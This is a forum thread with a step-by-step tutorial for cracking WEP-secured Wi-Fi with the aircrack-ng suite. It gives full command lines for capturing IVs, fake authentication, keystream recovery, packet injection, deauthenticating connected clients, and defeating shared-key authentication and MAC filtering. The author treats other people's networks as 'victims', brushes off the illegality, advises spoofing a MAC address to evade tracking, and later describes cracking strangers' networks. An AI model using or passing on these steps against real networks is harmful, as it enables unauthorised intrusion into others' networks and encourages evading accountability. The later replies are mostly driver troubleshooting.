Page 1 of 1

How to crack WEP secured wireless networks

Posted: Sun May 17, 2009 10:49 pm
by Sethioz
Knowledge Database Article is available, strongly recommended to read that, instead of this.

Video Tutorial
How to patch zydas 1211 / zd1211 chipset in order to get injection working

It took me freaking ages to get my stuff working, but finally i did.
struggle is with the hardware, i have rtl8185 which is supported by backtrack4 now !
so all you need is a copy of backtrack4-beta and you are good to go.

Toolz (OS) Needed:
Backtrack 5 (or any other linux, BT4 is suggested because it has all the tools in it) - has to be BT5 (either beta or full), under 4 will not have the drivers.
aircrack-ng suite - you do not need this if you are using backtrack 4 (its already built in), you only need it if you using other linux.

lets get down to the cracking part then.

NOTE : everyhing is done in the terminal, so if i say type, then it means into terminal !
NOTE2 : if your interface is different, then fix it first ! my main interface of wireless adapter is "wlan0" and activated rfmon mode (monitor mode) is "mon0" so my examples are with those !

1. open terminal and type

Code: Select all

airmon-ng start mon0
where mon0 is the interface of your card, type just airmon-ng without arguments to see the interface ! if it is not mon0, then replace it with the one you have.
now it says that monitor mode is enabled on mon0 (we use this now to capture)

2. now lets capture some packets by typing

Code: Select all

airodump-ng mon0
this will show you the available networks
press ctrl+c to stop it
now pick your 'victim' and copy the bssid of it (mac)

3. type

Code: Select all

airodump-ng --bssid 00:00:00:00:00:00 --channel 1 --ivs -w yourfile.ivs mon0
--bssid is the mac of the victim you picked ! paste it there
--channel < look on what channel your 'victim' is/was
--ivs captures the ivs
-w output file where it saves packets (you do not need to put .ivs at end !)
mon0 < monitoring interface you activated
now let it be as it is and do not touch it
NOTE - you need at least 1 data packet to get it going, if there is no data transfered in 10 mins or so, then you can pick new 'victim' or wait until somebody connects

4. you need to authenticate your mac address with AP first ! or injection will fail.

Code: Select all

aireplay-ng -1 1 -a 00:00:00:00:00:00 mon0

-1 < delay (if you are CLOSE to the WAP, then use 1, its delay, needs to be bigger if you are further away and signal is weak)
-a bssid (mac) of your victim


Code: Select all

aireplay-ng -5 -b 00:00:00:00:00:00 mon0
-b < this is your victim's mac as before
mon0 < this is your interface you use to send packets
you need to wait until you get the keystream ! it will stop and say when its found



Code: Select all

aireplay-ng -4 -b 00:00:00:00:00:00 mon0
-4 < decrypts a WEP packet (chopchop method)
-b < bssid (mac) of your victim AP
mon0 < your monitoring interface

now wait until you get the keystream !
once its found, you can move to step 6 and close 4 and 5 (ofcourse do not forget to COPY the keystream file name !!!, it looks like keystream3232.xor)

NOTE - it seems that method 5b works better, because it seem to be needing only one packet to chopchop it and generate a keystream. extremely useful if access point does not send many data packets. like about 10 mins ago i ran into one that sent data packets very rarely.

6. lets build a packet using the keystream file

Code: Select all

packetforge-ng -0 -a (bssid) -h (put random)  -l -k -y keystream.xor -w packet1
-y < this the .xor file that you found already
-w < this is the output where you will save it
-h < this is your mac address (fake), you can prolly leave this out at all
-a < mac of your victim

7. now lets send some fake packets to boost the traffic

Code: Select all

aireplay-ng -3 -r packet1 -b 00:00:00:00:00:00 mon0
-r < this is the file which you just made in step 6
-b < bssid of your victim again
mon0 < interface you use to send fake traffic

- How to crack when router has a flood protection
- simply add

Code: Select all

-x [number of packets per second]
- where [number of packets per second] is the desired delay. 10 packets per second should not cause a mac ban, however if it does, then simply use -h option to change your mac, but remember to add same mac to both, to fake authentication and step 7.

8. now check your first window (airodump-ng) and wait until you have about 75000-100000 packets (works FINE on WEP)

9. now we can try to crack that key, DO NOT close airodump-ng, let it capture

Code: Select all

aircrack-ng yourfile.ivs
yourfile.ivs < this is the file you specified in step 3
it should give you the key in less than 5 seconds !
if you didn't got it, then post your error here, because i was always successful on this point. if it says that not found or something, then maybe you didnt had enought packets, wait until you have 200000 packets ? and try again. i will include some screens here too (look below).

WARNING! I should warn you that it is illegal to crack somebody elses network, but who gives a shit these days ?! Just spoof your MAC and make sure there's no FBI vans outside who may use GPS to track the source (you).

recently i discovered that i do not need to use airmon-ng at all. i can simply do "airodump-ng wlan0" and it puts my card on monitoring mode too.

scratch that last update, dunno why it worked before, but now i do need to use airmon-ng, maybe some fuck-up.
anyways i found out that "delay" mentioned in "step 5" is always good to put on 1.

first i tought that you need over 50000 packets to successfully crack WEP (based on what i have read about WEP cracking), but from my own experience, 20000-30000 is more than enought. ofcourse depending on the strenght of the key. I managed to crack one network with 10000 ivs ! i included the screenshot of it (last screen).

i recently cracked 2 more WEPs, i was able to crack both with about 10000 ivs only. one had 12000 and other had 10000 or so.

I have played around with WEP networks in past 3 days. it is kind a obvious, but still mentioning it. it is not just the antenna that matters, it is very important to have a proper card too.
for example i have tested with USB adapter and PCI adapter (TP-link with atheros chipset and some PCI card with RTL8185 chipset)
I left antenna on same place, using windows XP and PCI card, signals were quite ok. i was able to connect to the station. speedtest ping was 60ms, which is quite good, while using USB adapter and backtrack5, i barely saw the station.
i have no idea how powerful these cards are, but my guess is 500 - 1000mW, im getting a 2000mW card now. hoping it will be even better signal.

sucessful cracking of WEP in less than 10 mins
(201.76 KiB) Downloaded 3754 times
sending and capturing of the fake packets
(206.66 KiB) Downloaded 3753 times
using kismet to get info from the WAPs
(129.22 KiB) Downloaded 3755 times
WEP cracked with only 10000 ivs
WEP cracked with only 10000 ivs
10kcrack.png (39.55 KiB) Viewed 42007 times

Re: How to crack WEP secured wireless networks

Posted: Wed Sep 30, 2009 6:49 pm
by Sethioz
Thanks to V i now write the tutorial how to crack WEP when it uses shared key authentication. V had that problem and was unable to crack the WEP network, because it was using WEP shared key.

So what is shared key authentication ?
here's a chunk from wikipedia to make it clear in few words:
1. The client station sends an authentication request to the Access Point.
2. The Access Point sends back a clear-text challenge.
3. The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request.
4. The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

so to be able to crack wep that uses shared key, you need that 4-way handshake authentication packet. it means you can't crack it if there are no connected clients.
right, lets start with it.

NOTE: this tutorial is written assuming that you have read the tutorial above !

1. set your card to monitor mode.

2. Lets capture the handshake, instead of capturing ivs only, you need to capture full packets.

Code: Select all

airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w blahpacket mon0
-c or --channel > channel
--bssid > mac of the victim AP
-w > file where you want to save packets
mon0 > your monitor device

basically you need to either wait until somebody logs into AP or deauthenticate the connected client to get the handshake. how you know when you got it ?!
look into airodump's window, there is row saying "AUTH". once "SKA" appears under that, then you have successfully got it. check the directory where it saves the packets (usually your home directory) and you should see files like this:
blahpacket-01-01-14-22--33-84.xor blahpacket-01.cap blahpacket-01.txt
"blahpacket-01-01-14-22--33-84.xor" file contains the needed data for fake authentication.

3. How to get the .xor file if there is client connected already. simple, we deauthenticate that client, forcing him/her to authenticate again.

Code: Select all

aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:06:66:77:88:99 mon0
-0 > deauthentication feature, where 1 is number of times to send
-a > mac address of your victim (access point)
-c > mac address of connected client
mon0 > monitoring interface

4. making the fake deauthentication to get more packets for cracking.

Code: Select all

aireplay-ng -1 0  -e nameofAP -y blahpacket-01-01-14-22--33-84.xor -a 00:11:22:33:44:55 -h 00:06:66:77:88:99 mon0
-1 > fake authentication feature
0 > authenticate only once
-e > name of the access point
-y > selects the .xor file containing the PRGA xor bits to make sucessful authentication with shared key.
-a > mac address of access point (victim)
-h > fake mac address for yourself (optional, but better safe than sorry)
mon0 > your monitoring interface

Now other steps you can get from above. this only explained how to make fake authentication when AP uses shared key. other steps are same. you simply send fake authentications to get the data flow going.

NOTE: even I didn't know about shared key before. so it means that it must be very rare. also before writing this, i wanted to make video tutorial on this, but i discovered that my Speedtouch 780WL router does not even support WEP shared. and st780wl is quite good router.

Re: How to crack WEP secured wireless networks

Posted: Sat Feb 13, 2010 7:01 pm
by Ileostomy
well i bought W-lan stick now
and now the problem is , that backtrack 4 does not detect any usb device.
No usb stick and no W-lan stick, is there a command or smt to activate usb ?

Re: How to crack WEP secured wireless networks

Posted: Sat Feb 13, 2010 11:26 pm
by Sethioz
no there is no command, but there are drivers. i suggest installing uBuntu instead. your laptop was a big mess, i suggest format it and put xp + ubuntu on it as dual boot, if you want to make it a powerful cracking and hacking tool.
i assume you are testing it on laptop, i remember that backtrack4 didn't even detect your internal adapter on some reason.
anyways try if USB stick works fine in windows (any windows). if so, then you need drivers.
ubuntu should install them manually.

also give more info, what usb it is ? it might be some compatibility problem, check and search for the list.
registering and asking a question on their forum is quite pointless, they are full of themselves and won't really help, they just say "google" or "read wiki" .. thats dumb.
however its not so hard to find the compatibility list on their site. its a hassle, i know, but this is how cracking and hacking is.

1. find out what chipset your USB card has (manufacturer doesn't matter, just the chipset)
2. go to and find out if your chipset is supported (it might be supported on windows, but i doubt).
3. either get right drivers from or install ubuntu and see if it install them.
4. in ubuntu get "aircrack-ng" suite, using synaptic packet manager.

Re: How to crack WEP secured wireless networks

Posted: Tue Feb 16, 2010 7:19 am
by Ileostomy
YEah , my USB stick works fine in any windows and my W-lan stick 2
So the problem is in Bt4 , so ill get ubuntu now and follow ur sugesstions :)

Re: How to crack WEP secured wireless networks

Posted: Wed Feb 17, 2010 12:47 pm
by Ileostomy
Ok i got Ubuntu now , and installed nicey
Now i neeed to get my W-lan stick running there, what i need to do for that is fist downloading all the Ubuntu updates
what i CANT do because the partition of Ubuntu wich it created itself is to small , so i downloaded Gparted Partition manager and try to resize the partition...
I also figured out my chipset of my W-lan stick, Its " Atheros "

Re: How to crack WEP secured wireless networks

Posted: Wed Feb 17, 2010 9:11 pm
by Sethioz
atheros is most common, so it should work fine, but this isn't linux discussion, next time use manual setup or "side by side" option.

you do not need ubuntu updates (unless its some old shit, but im sure you downloaded new one. 9.10 is newest atm).
im not sure about below 9.04, but my first ubunut was 9.04 and it worked just fine without any additional drivers.
all you need to do is just download "aircrack-ng". you can do that via synaptic update manager or console ("apt-get install aircrack-ng" should work)

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 12:26 pm
by Ileostomy
I did that but it still does not detect my W-lan stick.
Theres a little light on my w-lan stick wich is not glowing either

so wht did i do wrong ?

NOTE:Its not the USB device, it detects my USB sticke fine now !

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 7:29 pm
by Ileostomy
I was looking for an tutorial on how to get my fucking Wlan stick working but still no succses :@

I found this :
And followed this tutorial like the other guy did :

And everything worked like the tutorial explained but without any result !!
It still does not detect my friggin TL-WN620G W-lan stick ...
BTW i've got the Ubuntu 9.04 Jaunty Jackalope

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 10:14 pm
by Sethioz
it is totally offtopic, there's a linux topic somehwere, if you can't find it, make a new one with as detailed title as possible.

Re: How to crack WEP secured wireless networks

Posted: Thu Mar 24, 2011 4:29 pm
by Sethioz
i decided go wireless fishing and i tripped over tought one. it uses SKA (shared key authentication), but it should matter.
its WEP ofc, problem is that nothing seem to be working properly. i keep getting errors using -4 and -5 options in aireplay.
i tried different MAC addresses and still nothing. some stations temporarly ban your MAC if you keep flooding them, so you must run new fake auth using new faked MAC and then change MAC for other commands too, but this one is even toughter than that.

what seem to be working best, is that there is one connected client and i stole its MAC and using that, so no authentication is needed at all. this reduces traffic between me and AP. it might be bad signal and it might be bad router.
anyway, if you have this issue, try stealing MAC from connected clients, it might work better than fake auth.

however if connected client sends enough data, then there is no need to do anything else but just wait and get enough data packets and crack it. in my case connected client is not sending enough data, like 5000 packets in hour, so i have to wait 5 hours to get it cracked without any interaction from my side.

Re: How to crack WEP secured wireless networks

Posted: Sat May 05, 2012 1:15 am
by Sethioz
i've done it so many times, yet i find new tricks and tools.
for example i have one tought station that doesn't even accept fake authentications. seems like it has MAC filtering on, however what i did, is i changed my MAC to same as AP itself and then it accepted the fake authentications.
just a note what to do if it won't accept fake auths.
however other problem is that it won't send any data packets at all. it's odd tho. authentication is OPEN, it should accept all, must be MAC filtering only. anyway it works if you use AP's own MAC.